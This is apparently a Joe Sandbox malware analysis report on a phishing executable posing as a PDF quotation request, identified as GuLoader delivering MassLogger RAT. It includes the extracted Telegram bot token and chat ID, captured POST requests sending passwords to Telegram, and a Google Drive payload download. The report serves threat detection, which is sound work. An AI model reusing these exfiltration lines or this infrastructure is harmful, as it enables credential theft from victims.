Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe

Overview

General Information

Sample name:REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Analysis ID:1575710
MD5:fd9335d7160883534e42839297a65c7d
SHA1:80cd18a77f7896e06adc5bb4eb544e6c7e5bad5d
SHA256:7fccb9545a51bb6d40e9c78bf9bc51dc2d2a78a27b81bf1c077eaf405cbba6e9
Tags:exeGuLoaderuser-threatcat_ch
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T08:44:52.642100+010020577441Malware Command and Control Activity Detected192.168.2.549837149.154.167.220443TCP
            2024-12-16T08:44:56.153699+010020577441Malware Command and Control Activity Detected192.168.2.549846149.154.167.220443TCP
            2024-12-16T08:44:59.615943+010020577441Malware Command and Control Activity Detected192.168.2.549857149.154.167.220443TCP
            2024-12-16T08:45:04.530721+010020577441Malware Command and Control Activity Detected192.168.2.549869149.154.167.220443TCP
            2024-12-16T08:45:18.338618+010020577441Malware Command and Control Activity Detected192.168.2.549904149.154.167.220443TCP
            2024-12-16T08:45:21.677927+010020577441Malware Command and Control Activity Detected192.168.2.549913149.154.167.220443TCP
            2024-12-16T08:45:25.312878+010020577441Malware Command and Control Activity Detected192.168.2.549924149.154.167.220443TCP
            2024-12-16T08:45:28.684774+010020577441Malware Command and Control Activity Detected192.168.2.549932149.154.167.220443TCP
            2024-12-16T08:45:31.974564+010020577441Malware Command and Control Activity Detected192.168.2.549943149.154.167.220443TCP
            2024-12-16T08:45:36.359279+010020577441Malware Command and Control Activity Detected192.168.2.549955149.154.167.220443TCP
            2024-12-16T08:45:39.676339+010020577441Malware Command and Control Activity Detected192.168.2.549963149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T08:44:42.104474+010028032742Potentially Bad Traffic192.168.2.549812158.101.44.24280TCP
            2024-12-16T08:44:50.151400+010028032742Potentially Bad Traffic192.168.2.549812158.101.44.24280TCP
            2024-12-16T08:44:54.198292+010028032742Potentially Bad Traffic192.168.2.549844158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T08:44:34.594664+010028032702Potentially Bad Traffic192.168.2.549790172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe.616.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeVirustotal: Detection: 46%Perma Link
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeReversingLabs: Detection: 23%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAD9E0 CryptUnprotectData,4_2_37CAD9E0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAD9DF CryptUnprotectData,4_2_37CAD9DF
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49817 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49790 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAC985h4_2_37CAC638
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CA1042h4_2_37CA0C28
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CA0671h4_2_37CA03C4
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAEA48h4_2_37CAE79F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CA1042h4_2_37CA0F6F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAE198h4_2_37CADEEF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAC041h4_2_37CABD88
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAB791h4_2_37CAB4EC
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CA1042h4_2_37CA0C1A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAEEA0h4_2_37CAEBF7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAE5F0h4_2_37CAE347
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CADD40h4_2_37CADA9C
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAC499h4_2_37CAC1F2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CABBE9h4_2_37CAB944
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37CAF2F8h4_2_37CAF054
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D5882Dh4_2_37D58650
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D591B7h4_2_37D58650
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then push 00000000h4_2_37D5BDF0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D56A68h4_2_37D567C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D51250h4_2_37D50FA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D54218h4_2_37D53F70
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D561B8h4_2_37D55F10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D53968h4_2_37D536C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D55908h4_2_37D55660
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D530B8h4_2_37D52E10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D55058h4_2_37D54DB0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D52808h4_2_37D52560
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D57770h4_2_37D574C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D51F58h4_2_37D51CB0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D56EC0h4_2_37D56C18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D516A8h4_2_37D51400
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D54670h4_2_37D543C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_37D5CBE7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37D57B4F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37D58373
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D56610h4_2_37D56368
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D53DC0h4_2_37D53B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D55D60h4_2_37D55AB8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D53510h4_2_37D53268
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D554B0h4_2_37D55208
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37D58193
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D52C60h4_2_37D529B8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D523B0h4_2_37D52108
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then push 00000000h4_2_37D5C92F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D51B00h4_2_37D51858
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D57318h4_2_37D57070
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then jmp 37D54ACAh4_2_37D54820
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4x nop then push 00000000h4_2_383CE7C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49837 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49924 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49904 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49963 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49846 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49857 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49932 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49943 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49869 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dadbdd2d442Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dd8a5601335Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e17dc155d45Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ebb7bf07885Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ee4c9083d38Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f0f291b1e8eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f3a96920953Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f6860597c58Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fa6c0cb5abeHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fe3675fc152Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49844 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49790 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49817 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
